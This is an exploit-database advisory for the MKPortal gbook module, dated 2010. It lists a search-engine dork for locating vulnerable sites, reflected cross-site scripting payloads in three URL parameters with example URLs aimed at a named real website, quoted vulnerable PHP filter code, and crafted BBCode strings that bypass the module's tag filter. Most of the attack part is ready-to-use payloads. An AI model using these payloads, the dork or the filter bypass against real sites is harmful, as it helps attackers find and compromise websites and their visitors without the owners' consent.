The MKPortal GBook module suffers from cross site scripting vulnerabilities.
e1e50bf15277fb1b337c915bed90a071109969b1dfa22fa34f1ab2896a468238
==========================================
MKPortal <= gbook module XSS Vulnerability
==========================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
##################################################
Vulnerable products: MKPortal module gbook Exploit
Dork: "inurl:index.php?Ind=gbook"
##################################################
---------------------------------------------------------------------
1. Multiple pXSS
Vulnerability in the file index.php.
Exploit:
/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E
Example:
http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
http://otradnoe.ru.net//index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E
---------------------------------------------------------------------
2. Insert prohibited bb-tags [img] and [url] in the message
Vulnerability in the file index.php.
A vulnerable piece of code:
$message = stripslashes($message);
$message = preg_replace('/\[URL=(.+?)\](.+)\[\/URL\]/i',$no_url,$message);
$message = preg_replace('/\[IMG\](.+?)\[\/IMG\]/i',$no_img,$message);
$message = str_replace("ttp","", $message);
get around restrictions:
[UttpRL=htttptp://inj3ct0r.com]inj3ct0r.com[/URL]
[IMttpG]htttptps://inj3ct0r.org/image.php?i=1&dateline=[/IMG]
# Inj3ct0r.com [2010-04-04]